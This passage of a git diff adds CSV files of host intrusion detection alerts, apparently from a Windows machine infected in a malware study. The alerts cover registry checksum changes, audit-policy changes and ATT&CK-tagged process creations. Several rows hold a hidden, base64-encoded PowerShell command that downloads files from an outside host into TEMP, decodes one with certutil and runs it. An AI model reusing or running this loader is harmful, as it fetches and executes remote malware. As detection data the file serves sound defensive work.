'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '9d9105652e2f7b4afa5cb007b7d91920' +New md5sum is : '1c2ba1597228115961d6328c1fe5d3a2' +Old sha1sum was: 'f8cdf7cd739982a615ae6807a053614f911273d8' +New sha1sum is : '24110a9e96de59086bd21fa5431c88af7ee637a0' +", +"Apr 26, 2020 @ 10:40:10.983",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '9b2eb62ca4c74330ffa1448b22e6dfac' +New md5sum is : '4ba4365f07f1541a9d0cb4adc696cbaa' +Old sha1sum was: '9ae0bb56b661cb86cac596f8cf95cde5c871458b' +New sha1sum is : '6766757ccbe9ec12bc588faf319b992e7bd63e19' +", +"Apr 26, 2020 @ 10:39:05.687",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:10:40Z. Reason: RulesEngine.""" diff --git a/data/MW_19_HIDS_3.csv b/data/MW_19_HIDS_3.csv new file mode 100644 index 0000000..aeea9a2 --- /dev/null +++ b/data/MW_19_HIDS_3.csv @@ -0,0 +1,183 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","full_log" +"May 23, 2020 @ 13:47:50.035",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '271f59daf9ca28fbeb0bd234897e1662' +New md5sum is : '7b0e21ee99623454e8d06871f064ed98' +Old sha1sum was: 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +New sha1sum is : 'f63735bbc2e72216030f4e994b7c9785856a9170' +" +"May 23, 2020 @ 13:47:48.878",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '4cea2c835f70071dc02ed62b073dfba8' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '77e72a40def388a760e7dd5d34aee517e6c01817' +" +"May 23, 2020 @ 13:47:48.862",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : 'f09b8f706fbbdc831b56268167855de8' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '765494a3d04df5b143fa79ecd655484a9d80378a' +" +"May 23, 2020 @ 13:46:42.124",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '85a6f1b1286ecf20e01235e2d33ec25a' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'dc139d9e9ad39ee0dadd9b4f52db078581cfb394' +" +"May 23, 2020 @ 13:46:42.065",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '611308539b0b432c267cdad008c8d152' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '946019a260c9ac9732156f3dfde8ab1a02093bbd' +" +"May 23, 2020 @ 13:46:42.048",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : 'aa153037b39970a484b4832b0ffe8501' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '18145d2068766fb817f5dc40a5c023c4b7d7cb8d' +" +"May 23, 2020 @ 13:46:41.975",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '611308539b0b432c267cdad008c8d152' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '946019a260c9ac9732156f3dfde8ab1a02093bbd' +" +"May 23, 2020 @ 13:46:41.641",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases\Members' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '611308539b0b432c267cdad008c8d152' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '946019a260c9ac9732156f3dfde8ab1a02093bbd' +" +"May 23, 2020 @ 13:46:41.604",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-438079597-2123118846-2669748851' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '708111ebe998051bf46012611efd58c7' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '87407fbef078448a88fc7baf977bb2cc979eb369' +" +"May 23, 2020 @ 13:46:16.839",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 23, 2020 @ 13:46:09.098",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 23, 2020 @ 13:44:39.392",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM' checksum changed. +Old md5sum was: '85a6f1b1286ecf20e01235e2d33ec25a' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'dc139d9e9ad39ee0dadd9b4f52db078581cfb394' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:44:39.374",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains' checksum changed. +Old md5sum was: '611308539b0b432c267cdad008c8d152' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '946019a260c9ac9732156f3dfde8ab1a02093bbd' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:44:39.370",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin' checksum changed. +Old md5sum was: 'aa153037b39970a484b4832b0ffe8501' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '18145d2068766fb817f5dc40a5c023c4b7d7cb8d' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:44:39.359",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases' checksum changed. +Old md5sum was: '611308539b0b432c267cdad008c8d152' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '946019a260c9ac9732156f3dfde8ab1a02093bbd' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:44:39.333",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases\Members' checksum changed. +Old md5sum was: '611308539b0b432c267cdad008c8d152' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '946019a260c9ac9732156f3dfde8ab1a02093bbd' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:44:39.312",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-438079597-2123118846-2669748851' checksum changed. +Old md5sum was: '708111ebe998051bf46012611efd58c7' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '87407fbef078448a88fc7baf977bb2cc979eb369' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:39:30.424",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 23, 2020 @ 13:38:13.251",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 23, 2020 @ 13:38:13.157",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 23, 2020 @ 13:38:05.891",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +" +"May 23, 2020 @ 13:37:59.985",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +" +"May 23, 2020 @ 13:37:42.866",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:18:27.845 +ProcessGuid: {df9fc3d3-d123-5ec7-0000-00107aa91300} +ProcessId: 6856 +Image: C:\Windows\System32\certutil.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: CertUtil.exe +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: CertUtil.exe +CommandLine: ""C:\Windows\system32\certutil.exe"" -decode xtd42 y29x3 +CurrentDirectory: C:\Users\John Williams\AppData\Local\Temp\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=DE9C75F34F47B60A71BBA03760F0579E,SHA256=12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,IMPHASH=336674CB3C8337BDE2C22255345BFF43 +ParentProcessGuid: {df9fc3d3-d121-5ec7-0000-0010716f1300} +ParentProcessId: 6560 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: powershell -windowstyle hidden -en SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvAHMAaABvAHcAMgAuAHcAZQBiAHMAaQB0AGUALwBnAGUAWgBqAFMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAG4ATQBiAGQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAGEAYwBQAE0AUQAuAGQAYQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdABrAG8AbABkAC4AYwBvAG0AIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXAB4AHQAZAA0ADIAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABhAGMAUABNAFEALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHgAdABkADQAMgAgAHkAMgA5AHgAMwA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdABrAG8AbABkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAMgA5AHgAMwA=""","\""C:\\Windows\\system32\\certutil.exe\"" -decode xtd42 y29x3","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:27.894942900Z"",""eventRecordID"":""912"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:18:27.845\r\nProcessGuid: {df9fc3d3-d123-5ec7-0000-00107aa91300}\r\nProcessId: 6856\r\nImage: C:\\Windows\\System32\\certutil.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: CertUtil.exe\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CertUtil.exe\r\nCommandLine: \""C:\\Windows\\system32\\certutil.exe\"" -decode xtd42 y29x3\r\nCurrentDirectory: C:\\Users\\John Williams\\AppData\\Local\\Temp\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=DE9C75F34F47B60A71BBA03760F0579E,SHA256=12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,IMPHASH=336674CB3C8337BDE2C22255345BFF43\r\nParentProcessGuid: {df9fc3d3-d121-5ec7-0000-0010716f1300}\r\nParentProcessId: 6560\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: powershell -windowstyle hidden -en SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvAHMAaABvAHcAMgAuAHcAZQBiAHMAaQB0AGUALwBnAGUAWgBqAFMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAG4ATQBiAGQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAGEAYwBQAE0AUQAuAGQAYQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdABrAG8AbABkAC4AYwBvAG0AIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXAB4AHQAZAA0ADIAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABhAGMAUABNAFEALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHgAdABkADQAMgAgAHkAMgA5AHgAMwA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdABrAG8AbABkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAMgA5AHgAMwA=\""""},""eventdata"":{""utcTime"":""2020-05-22 13:18:27.845"",""processGuid"":""{df9fc3d3-d123-5ec7-0000-00107aa91300}"",""processId"":""6856"",""image"":""C:\\\\Windows\\\\System32\\\\certutil.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""CertUtil.exe"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""CertUtil.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\certutil.exe\\\"" -decode xtd42 y29x3"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=DE9C75F34F47B60A71BBA03760F0579E,SHA256=12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,IMPHASH=336674CB3C8337BDE2C22255345BFF43"",""parentProcessGuid"":""{df9fc3d3-d121-5ec7-0000-0010716f1300}"",""parentProcessId"":""6560"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""powershell -windowstyle hidden -en SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvAHMAaABvAHcAMgAuAHcAZQBiAHMAaQB0AGUALwBnAGUAWgBqAFMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAG4ATQBiAGQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAGEAYwBQAE0AUQAuAGQAYQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdABrAG8AbABkAC4AYwBvAG0AIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXAB4AHQAZAA0ADIAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABhAGMAUABNAFEALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHgAdABkADQAMgAgAHkAMgA5AHgAMwA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdABrAG8AbABkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAMgA5AHgAMwA=""}}}" +"May 23, 2020 @ 13:37:40.225",15,"ATT&CK T1047: Wmiprvse Spawning Process","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:18:25.253 +ProcessGuid: {df9fc3d3-d121-5ec7-0000-0010716f1300} +ProcessId: 6560 +Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Windows PowerShell +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: PowerShell.EXE +CommandLine: powershell -windowstyle hidden -en SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvAHMAaABvAHcAMgAuAHcAZQBiAHMAaQB0AGUALwBnAGUAWgBqAFMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAG4ATQBiAGQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAGEAYwBQAE0AUQAuAGQAYQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdABrAG8AbABkAC4AYwBvAG0AIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXAB4AHQAZAA0ADIAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABhAGMAUABNAFEALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHgAdABkADQAMgAgAHkAMgA5AHgAMwA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdABrAG8AbABkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAMgA5AHgAMwA= +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481 +ParentProcessGuid: {df9fc3d3-d0e3-5ec7-0000-00107c1d0700} +ParentProcessId: 5700 +ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe +ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding""","powershell -windowstyle hidden -en SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvAHMAaABvAHcAMgAuAHcAZQBiAHMAaQB0AGUALwBnAGUAWgBqAFMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAG4ATQBiAGQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAGEAYwBQAE0AUQAuAGQAYQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdABrAG8AbABkAC4AYwBvAG0AIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXAB4AHQAZAA0ADIAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABhAGMAUABNAFEALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHgAdABkADQAMgAgAHkAMgA5AHgAMwA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdABrAG8AbABkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAMgA5AHgAMwA=","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:25.263709300Z"",""eventRecordID"":""909"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:18:25.253\r\nProcessGuid: {df9fc3d3-d121-5ec7-0000-0010716f1300}\r\nProcessId: 6560\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: powershell -windowstyle hidden -en SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvAHMAaABvAHcAMgAuAHcAZQBiAHMAaQB0AGUALwBnAGUAWgBqAFMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAG4ATQBiAGQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAGEAYwBQAE0AUQAuAGQAYQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdABrAG8AbABkAC4AYwBvAG0AIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXAB4AHQAZAA0ADIAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABhAGMAUABNAFEALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHgAdABkADQAMgAgAHkAMgA5AHgAMwA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdABrAG8AbABkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAMgA5AHgAMwA=\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481\r\nParentProcessGuid: {df9fc3d3-d0e3-5ec7-0000-00107c1d0700}\r\nParentProcessId: 5700\r\nParentImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe\r\nParentCommandLine: C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding\""""},""eventdata"":{""utcTime"":""2020-05-22 13:18:25.253"",""processGuid"":""{df9fc3d3-d121-5ec7-0000-0010716f1300}"",""processId"":""6560"",""image"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Windows PowerShell"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""PowerShell.EXE"",""commandLine"":""powershell -windowstyle hidden -en 